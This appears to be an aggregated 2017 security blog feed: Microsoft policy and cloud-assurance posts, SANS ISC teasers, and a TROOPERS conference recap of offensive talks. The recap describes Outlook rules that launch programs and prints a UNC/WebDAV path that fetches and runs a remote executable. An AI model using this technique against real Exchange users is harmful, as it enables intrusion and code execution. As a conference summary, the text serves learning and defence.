Wednesday, March 29, 2017

Future-proofing principles against technological change

In recent years, governments’ concerns about cybersecurity, data protection, and other information and communications technology (ICT) related issues have led to new policies, legislation, and regulation. In response, the ICT industry has consistently called for laws and rules that focus on outcomes and on principles, rather than on processes and prescriptions. This call has become so ubiquitous, however, that there is a danger it has become a hollow form of words. A truly outcome-oriented approach would be revolutionary and perhaps government or even industry will shy away from it, having forgotten why we need this approach in the first place.

So, I’d like to take a moment to re-examine the why and the how of outcomes- and principles-led legislation and regulation.

Technology moves fast; in 2007 we had the first iPhone and now we’re rolling out cloud computing. As a result, laws designed for telephony or paper files are increasingly difficult to apply, if not wholly irrelevant. Governments are acting on this realization, but as they do so they are inevitably looking to enshrine certain unchangeable points of principle into their new laws – from European privacy to American freedom of speech. And this where the essential rationale for principles-led approaches is most obvious. Immovable principles could be laid down as particular behaviors within particular technologies but then they would live and die with that technology. Allowing unchangeable points of principle to become contingent on something we know will change, i.e. technology, won’t work for governments or societies. A different approach is needed, one that future-proofs our principles against technological change.

So how would that actually work? On the surface it seems simple enough: governments state the outcomes they expect or principles they demand, give whatever limited controls/incentives they think necessary, and allow ICT providers and regulators to get on with it. The reality is necessarily more complex. For one thing, even within a single nation there may be varied societal perspectives on what is wanted in principle. For another, the outcomes of today’s solutions can form tomorrow’s problems. In light of this, an effective “future-proofing” process may require new policy or regulatory bodies that are more flexible and more broad-based, because they can take account of divergent priorities and can also look more clearly at future consequences.

In the ferment of technological change, we can forget that society changes too, sometimes profoundly. Once concrete principles can shift over time and what was once acceptable or helpful can cease to be so. Amusingly, I know someone who is a Freeman of the City of London, with a right to drive sheep across a bridge over the Thames. This might have been very useful at one point but today most people would rather have free parking. More seriously, in the past women and minorities have been unfairly treated (and in places still are, even today). Applying this insight to the heart of law- and rule-making might seem odd, especially to the lawyers and technocrats that currently dominate the process. But if a principles-led approach is to have true meaning and longevity then the inclusiveness of the process must be genuine.

Equally, what seems like a good solution today can have unintended consequences. In the 1890s motorized vehicles solved horse-drawn vehicles’ endless manure and carcasses but eventually led to pollution and transport crises. In the 1920s lead in petrol solved “knocking” in automobile motors but paved the way for “a catastrophe for public health”. In the 1990s and 2000s diesel and biofuels answered petrol’s CO2-emissions but caused particulate air pollution and food supply problems. The chance of unintended consequences from government interventions in ICT are even more significant. Technology has spread throughout our lives, businesses, and governments. As a result, unexpectedly problematic outcomes are more likely and are potentially more damaging. Any structure process pushing an outcomes-led approach needs to have the breadth of insights and expertise to minimize this risk. This means, once again, expanding the participants in the new approach beyond the current roster of legal and regulatory experts.

In conclusion, in order to help formulate lasting policies, law and regulations with a genuine focus on outcomes and principles, governments will need advice from new bodies with diverse legal, technical, social, and even philosophical membership. The new, non-traditional membership of these bodies will likely have to go beyond current “public private partnerships” if they are to deal with the operational differences, varying priorities, and distinct needs of those affected by new rules – now and in the foreseeable future. This will be a revolution in policy-making, equal in its own way to the technological revolution that has sparked it.

 

 



from Paul Nicholas

[SANS ISC] Logical & Physical Security Correlation

I published the following diary on isc.sans.org: “Logical & Physical Security Correlation“.

Today, I would like to review an example how we can improve our daily security operations or, for our users, how to help in detecting suspicious content. Last week, I received the following email in my corporate mailbox. The mail is written in French but easy to understand: It is a notification regarding a failed delivery (they pretended that nobody was present at the delivery address to pick up the goods)… [Read more]

[The post [SANS ISC] Logical & Physical Security Correlation has been first published on /dev/random]



from Xavier

Tuesday, March 28, 2017

Germany steps up leadership in cybersecurity

Cyberattacks are on the rise worldwide, but many countries are making strides in promoting and developing cybersecurity by developing policy frameworks, encouraging investment in research and development, and by driving awareness of cybersecurity best practices. Germany is one of the countries that has been trying to increase the cybersecurity of its broader online ecosystem for a number of years and is today more committed to that goal than ever. And what Germany does matters not just because it is one of the top five global economies, but because it is one of the leading European Union (EU) member states. What German policy-makers think and feel can have a major effect on the EU, a trading block of 500 million people with a GDP – on a par with the USA.

Microsoft’s Security Intelligence Report (SIR) shows Germany performs well compared to the global average when it comes to encounters with malware and the scale of infected computers (see the regional breakdown specific to Germany). Overall, the SIR shows the ongoing nature of the conflict between those delivering cybersecurity and those trying to break through, and even in the Germany of 2016 there was an uneven but upwards trend in encounters and infections.

A fundamental part of responding to these threats and the potentially significant economic damage they pose is, in my view, cooperation between government and the private sector. The new cybersecurity strategy seems to indicate that this is also the view of German policy-makers. Germany’s recognition of the importance of developing and implementing effective cyber security norms – along with the necessary means of verification/attribution – is very encouraging. And German support and leadership in the pertinent multi-lateral discussions will be crucial. In this context, it is worth noting that German leadership, during its 2016 Chairmanship of the Organization for Security and Co-operation in Europe, yielded concrete positive results in the related field of developing cybersecurity related confidence-building measures – which critically rely on different segments of society working together.

The strategy builds on Germany’s IT Security Law (IT-SiG), passed in 2015, which promoted cooperation between the German Federal Office for Information Security (BSI) and the industry in protecting critical infrastructure. Infrastructure protection is, of course, only one aspect of cybersecurity, and cooperation between governments and the private sector is only one part of the overall solution (for example, my Microsoft colleagues have also been arguing strongly for risk-based approaches to cybersecurity). Nonetheless, both the IT-SiG and the proposed strategy seem to be steps in the right direction. Cooperation between states and the private sector, including those who create information and communication technology (ICT) products and those who use them, seems like a very good way to develop effective cybersecurity policies and practices. What is true for Germany should be equally true for other EU member states.

The challenge is that, currently, not all companies may be happy about information exchange with the authorities (only 13 percent of companies in Germany are). It would be a terrible irony that just as governments realize the need for public-private partnerships in cybersecurity, companies start to step back from the opportunity. To prevent such a development, IT regulators will have to demonstrate the added value of receiving this information. They can do this by anonymizing it, and then sharing it with those private sector entities that need to know about it, and then acting on it to protect their systems and their customers.

Looking ahead, in order to enhance IT security in general and increase the protection of critical infrastructure in particular, public-private partnerships are essential, but they require commitment and buy-in from both sides. Microsoft is ready to play its part.

 



from Paul Nicholas

Monday, March 27, 2017

Giving CISOs assurance in the cloud

This post is authored by Mark McIntyre, Chief Security Advisor, Enterprise Cybersecurity Group.

Recently, I hosted a Chief Information Security Officer roundtable in Washington, DC. Executives from several US government agencies and systems integrators attended to share cloud security concerns and challenges, such as balancing collaboration and productivity against data protection needs, cyber threat detection, and compliance. Toward the end of the day, one CISO reminded me he needed assurance. He asked, “How can we trust Microsoft to protect our data? And, how can I believe what you say?”

This post provides an opportunity to share important updates and assurances about practices and resources that Microsoft uses to protect data and user privacy in the Cloud. It also offers information on resources available to CISOs and others, that demonstrate our continuing investments in transparency.

Security at scale

Increasingly, government officials as well as industry analysts and executives are recognizing and evangelizing the security benefits of moving to hyper-scale cloud service providers.  Microsoft works at this scale, investing $15B in the public cloud.  The internet user maps below provide useful insight into why and where we are making these investments. Figure 1 represents internet usage in 2015. The size of the boxes reflect numbers of users.  The colors indicate the percentage of people with access to the internet.

Figure 1, source “Cyberspace 2025: Today’s Decisions, Tomorrow’s Terrain

Now look at Figure 2, showing expected internet usage in 2025.  As you can see, global internet use and accompanying economic activity will continue to grow.

Figure 2

In addition to serving millions of people around the world, we are also moving Microsoft’s 100,000+ employees and our corporate infrastructure and data to the Cloud. We must therefore be confident that we can protect our resources as well as our users’.

How do we do it?  Microsoft invests over $1B per year in cybersecurity and data protection.  We start by ensuring that the software powering our data centers is designed, built and maintained as securely as possible. This video illustrates the world-class security Microsoft applies to data center protection.  We also continue to improve on years of development investments in the Security Development Lifecycle (SDL), to ensure that security is addressed at the very beginning stages of any product or service.  In the Cloud, the Operational Security Assurance framework capitalizes on the SDL and on Microsoft’s deep insights into the cybersecurity threat landscape.

One way that Microsoft detects cybersecurity activity in our data centers is the Intelligent Security Graph. Microsoft has incredible breadth and depth of signal and information we analyze from 450B authentications per month across our cloud services, 400B emails scanned for spam and malware, over a billion enterprise and consumer devices updated monthly, and 18B+ Bing scans per month. This intelligence, enhanced by rich expertise of Microsoft’s world class talent of security researchers, analysts, hunters, and engineers, is built into our products and our platform – enabling customers, and Microsoft, to detect and respond to threats more quickly. (Figures 3 & 4).  Microsoft security teams use the graph to correlate large-scale critical security events, using innovative cloud-first machine learning and behavior and anomaly-based search queries, to surface actionable intelligence.  The graph enables teams to collaborate internally and apply preventive measures or mitigations in near real-time to counter cyber threats.  This supports protection for users around the world, and assures CISOs that Microsoft has the breadth and scale to monitor and protect users’ identities, devices, apps and data, and infrastructure.

Figure 3

Figure 4

Access to data

Technology is critical for advancing security at hyper-scale, therefore Microsoft continues to evolve the ways in which administrators access corporate assets.  The role of network administrators is significant. In our cloud services, we employ Just Enough and Just Enough Administration access, under which admins are provided the bare minimum window of time and physical and logical access to carry out a validated task.  No admin may create or approve their own ticket, either. Further, Windows Server 2016 clients can implement these policies internally. Security and managing data centers at scale is an ever evolving process based on the needs of our customers, the changing threat landscape, regulatory environments and more.

Compliance

Microsoft works with auditors and regulators around the world to ensure that we operate data centers at the highest levels of security and operational excellence.  We maintain the largest compliance portfolio in the industry, for example against the ISO 22301 privacy standard. In addition, Microsoft maintains certifications such as CSA STAR Certification, HITRUST, FACT and CDSA which many of our cloud competitors do not.  For more about Microsoft certifications, visit the Microsoft Trust Center Compliance page.

Transparency

Being compliant with local, industry, and international standards establishes that Microsoft is trustworthy, but our goal is to be trusted.  Toward that end—and to ensure we address the needs of CISOs, Microsoft provides a wealth of information about cloud services, designed to provide direct and customer self-service opportunities to answer three key questions:

  • How is may data secured and protected?
  • How does Microsoft Cloud help me be compliant with my regulatory needs?
  • How does Microsoft manage privacy around my data?

The comments at our roundtable that prompted this blog show that our cloud security and compliance resources can be difficult to find, so while we double down on our efforts to raise awareness, bookmark this update and read below.  We operate the following portals, designed to facilitate self-service access to security and compliance information, FAQs and white papers, in convenient formats, and tailored to an organization’s geography, industry and subscription(s):

  • The Microsoft Trust Center, a centralized resource for enterprise customers to find answers about what Microsoft is doing to protect data, comply with regulatory requirements, and verify that we are doing what we say.
  • The Service Trust Portal (STP) is available for organizations under nondisclosure to current and potential Microsoft customers. It includes hundreds of important third-party audit reports, information on certifications, and internal security documents, for Azure, O365, Dynamics CRM Online, and Yammer. Examples include SOC and ISO audits reports.
  • The Service Assurance Portal, available to current O365 users, offers the same level of access but directly through the O365 subscription. This is a unique “transparency window” to provide customers with in-depth understanding in how we implement and test controls to manage confidentiality, integrity, availability, reliability, and privacy around customer data. Not only do we share the “what” about controls, but also the “how” about testing and implementation.

Government Security Program

Microsoft also participates in the Government Security Program as another key transparency initiative. Through the GSP, national governments (including regulators) may access deep architecture details about our products and services, up to and including source code. The GSP also provides participants with opportunities to visit Microsoft headquarters in Redmond to meet face to face with the teams that operate, monitor, and defend our company and products and services—including data centers—from cyber threats. They can also visit any of our Transparency Centers in Redmond, Brussels, Brasilia, and Singapore. Several dozen governments around the world use the GSP to obtain greater insight into how Microsoft builds, operates and defends its data centers, and by extension, how we protect users.

Microsoft stands ready to work with CISOs to raise awareness and ensure access to the resources discussed above. Visit the following sites to learn more. Microsoft has also created a dedicated team of cybersecurity professionals to help move you securely to the Cloud and protect your data. Learn more about the Enterprise Cybersecurity Group, or contact your local Microsoft representative.

Blogs: Microsoft Secure Blog and Microsoft On the Issues
Learn more about the Microsoft Enterprise Cloud
Read the Microsoft Security Intelligence Report
Follow us on Twitter: @MSFTSecurity



from Microsoft Secure Blog Staff

What you need to know about CASBs

Per Frost & Sullivan, more than 80 percent of employees admit to using non-approved SaaS apps in their jobs. The number of cloud services used by corporate employees is also quickly outpacing internal IT estimates. While IT groups typically estimate that employees are using 51 different services, the actual number is 15 times greater.

And it’s not just individual employees that are turning to shadow IT. Increasingly, non-approved SaaS applications are being adopted by entire work groups or departments, without IT’s knowledge, and with little consideration for the security risks they bring.

As employees continue to reach for tools and services that may not be IT-approved, IT professionals know they need to balance security risk tolerance while empowering departments and teams to achieve higher productivity.

How can you secure critical data without compromising productivity?

While the urge to block shadow IT is understandable, it’s at best, a short-term solution. Not only does it reduce an organization’s ability to innovate, it inevitably results in employees finding ways around the restrictions.

Rather than blocking users from accessing the services they need to do their jobs efficiently, IT administrators need to find ways to monitor these services, analyze their risk profile, and offer alternatives for apps that fail to meet security or compliance needs.

Cloud Access Security Brokers: Flexibility meets control

According to Gartner, Cloud Access Security Brokers (CASBs) are “on-premises or cloud-based security policy enforcement points that are placed between cloud service consumers and cloud service providers.”

They give organizations a detailed picture of how their employees are using the cloud.

  • Which apps are they using?
  • Are these apps risky for my organization?
  • Who are the top users?
  • What does the upload/download traffic look like?
  • Are there any anomalies in user behavior such as: impossible travel, failed logon attempts, suspicious IPs?

Such behaviors can indicate whether their account has been compromised or whether the worker is taking unauthorized actions.

Along with better threat protection, CASBs offer IT professionals better visibility and control over the apps used in their environment. Once you have discovered the full extent of the apps used in your environment, you can then set policies that control the data stored in these apps for data loss prevention.

Exploring a CASB solution can be a great step to enhancing your security environment. With better visibility, protection, and management over your shadow IT, you can give employees the choice to use the apps they need, without sacrificing the security and compliance your organization demands.

To learn more about shadow IT and how CASBs can help your organization, download the e-book.



from Microsoft Secure Blog Staff

Friday, March 24, 2017

[SANS ISC] Nicely Obfuscated JavaScript Sample

I published the following diary on isc.sans.org: “Nicely Obfuscated JavaScript Sample“.

One of our readers sent us an interesting sample that was captured by his anti-spam. The suspicious email had an HTML file attached to it. By having a look at the file manually, it is heavily obfuscated and the payload is encoded in a unique variable… [Read more]

[The post [SANS ISC] Nicely Obfuscated JavaScript Sample has been first published on /dev/random]



from Xavier

TROOPERS 2017 Day #4 Wrap-Up

I’m just back from Heidelberg so here is the last wrap-up for the TROOPERS 2017 edition. This day was a little bit more difficult due to the fatigue and the social event of yesterday. That’s why the wrap-up will be shorter…  The second keynote was presented by Mara Tam: “Magical thinking … and how to thwart it”. Mara is an advisor to executive agencies on information security issues. Her job focuses on the technical and strategic implications of regulatory and policy activity. In my opinion, the keynote topic remained classic. Mara explained her vision of the problems that the infosec community is facing when information must be exchanged with “the outside world”. Personally, I found that Mara’s slides were difficult to understand. 

For the first presentation of the day, I stayed in the main room – the offensive track – to follow “How we hacked distributed configuration management systems” by Francis Alexander and Bharadwaj Machhiraju. As we already saw yesterday with the SDN, automation is a hot topic and companies tend to install specific tools to automate the configuration tasks. Such software is called DCM or “Distributed Configuration Management”. They simplify the maintenance of complex infrastructures, the synchronization and service discovery. But, as software, they also have bugs or vulnerabilities and are, for a pentester, a nice target. They’re real goldmines because they content not only configuration files but if the attacker can change them, it’s even more dangerous. DCM can be agent-less or -based on agents. This is the second case that was the target of Francis & Bharadwaj. They reviewed three tools:

  • HashiCorp Consul
  • Apache Zookeeper
  • CoreOS etcd

For each tool, that explained the vulnerability they found and how it was exploited up to remote code execution. The crazy story is that all of them do not have authentication enabled by default! To automate the search for DCM and exploitation, they developed a specific tool called Garfield. Nice demos were performed during the talk with many remote shells and calc.exe spawned here and there.

The next talk was my favourite of today. It was about a tool called Ruller to pivot through Exchange servers. Etienne Stamens presented his research on Microsoft Exchange and how he reverse engineered the protocol. The goal is just to get a shell though Exchange. The classic phases of an attack were reviewed:

  • Reconnaissance
  • Exploitation
  • Persistence (always better!)

Basically, Exchange is a mail server but many more features are available: calendar, Lync, Skype, etc. Exchange must be able to serve local and remote users so it exposes services on the Internet. How do identify companies that use an Exchange server and how to find it? Simply thanks to the auto-discovery feature that is implemented by Microsoft. If your domain is company.com, Outlook will search for https://company.com/autodiscover/autodiscover.xml (+ other alternatives URLs if this one isn’t useful). Etienne did some research and found that 10% of the Internet domains have this process enabled. After some triage, he found that approximatively 26000 domains are linked to an Exchange server. Nice attack surface! The next step is to compromise at least one account. Here, classic methods can be used (brute-force, rogue wireless AP, phishing or dumps of leaked databases). The exploitation in itself is performed by creating a rule that will execute a script. The rule looks like “When the word “pwned” is present in the subject, start “badprogram.exe”. A very nice finding is the way Windows converts UNC path to webdav:

\\host.com@SSL\webdav\pew.zip\s.exe

will be converted to:

https://host.com/webdab/pew.zip

And Windows will even extract s.exe for you! Magic!

Etienne performed a nice demo of Ruler which automates all the process described above. Then, he demonstrated another tool called Linial which takes care of the persistence. To conclude, Etienne explained briefly how to harden Exchange to prevent this kind of attack. Outlook 2016 blocks unsafe rules by default which is good. An alternative is to block WebDAV and use MFA.

After the lunch, Zoz came back with another funny presentation: “Data Demolition: Gone in 60 seconds!”. The idea is simple: When you throw away some devices, you must be sure that they don’t contain remaining critical data. Classic examples are HD’s and printers. Also extremely mobiles devices like drones. The talk was some kind of a “Myth Busters” show for hard drives! Different techniques were tested by Zoz:

  • Thermal
  • Kinetic
  • Electric

For each of them, different scenarios were presented and the results demonstrated with small videos. Crazy!

Destroying HD's

What was interesting to notice is that most techniques failed because the disk plates could still be “cleaned” (ex: removing the dust) and become maybe readable by using forensic techniques. For your information, the most feasible techniques were: Plasma cutter or oxygen injector, nailguns and HV Power spike. Just one advice: don’t try this at home!

There was a surprise talk scheduled. The time slot was offered to The Grugq. Renowned security researcher, he presented “Surprise Bitches, Enterprise Security Lessons From Terrorists”. He talked about APT’s but not as a buzzword. He gave his own view of how APT’s work. For him, the term “APT” was invented by Americans and means: “Asia Pacific Threat“.

I finished the day back to offensive track. Mike Ossmann and Dominic Spill from Great Scott Gadgets presented “Exploring the Infrared, part 2“. The first part was presented at Schmoocon. Hopefully, they started with a quick recap. What is the infrared light and its applications (remote control, sensors, communications, heating systems, …). The talk was a suite of nice demos where they use replay attack techniques to abuse of tools/toys that work with IR like a Dunk Hunt game, a shark remote controller. The most impressive one was the replay attack against the Bosh audio transmitter. This very expensive device is used in big events for instant translations. They were able to reverse engineer the protocol and were able to play a song through the device… You can imagine the impact of such attack in a live event (ex: switching voices, replacing translations by others, etc). They have many more tests in the pipe.

IR Fun

The last talk was “Blinded Random Block Corruption” by Rodrigo Branco. Rodrigo is a regular speaker at TROOPERS and provides always good content. His presentation was very impressive. They idea is to evaluate the problems around memory encryption? How and why to use it? Physical access to the victim is the worse case. An attacker has access to anything. You implemented full-disk encryption? Cool but many info are in the memory when the system is running. Access to memory can be performed via Firewire, PCIe, PCMCIA and new USB standards. What about memory encryption? It’s good but encryption alone is not enough. Controls must be implemented. The attack explained by Rodrigo is called “BRBC” or  “Blinded Random Block Corruption“. After giving the details, a nice demo was realized: how to become root on a locked system? Access to the memory is more easy in virtualized (or cloud) environments. Indeed many hypervisors allow enabling a “debug” feature per VM. Once activated, the administrator has write access to the memory. By using a debugger, you can use the BRBC attack and bypass the login procedure. The video demo was impressive.

So, TROPPER 10th anniversary edition is over. I spend four awesome days attending nice talks and meeting a lot of friends (old & new). I learned a lot and my todo-list already expanded.

 

[The post TROOPERS 2017 Day #4 Wrap-Up has been first published on /dev/random]



from Xavier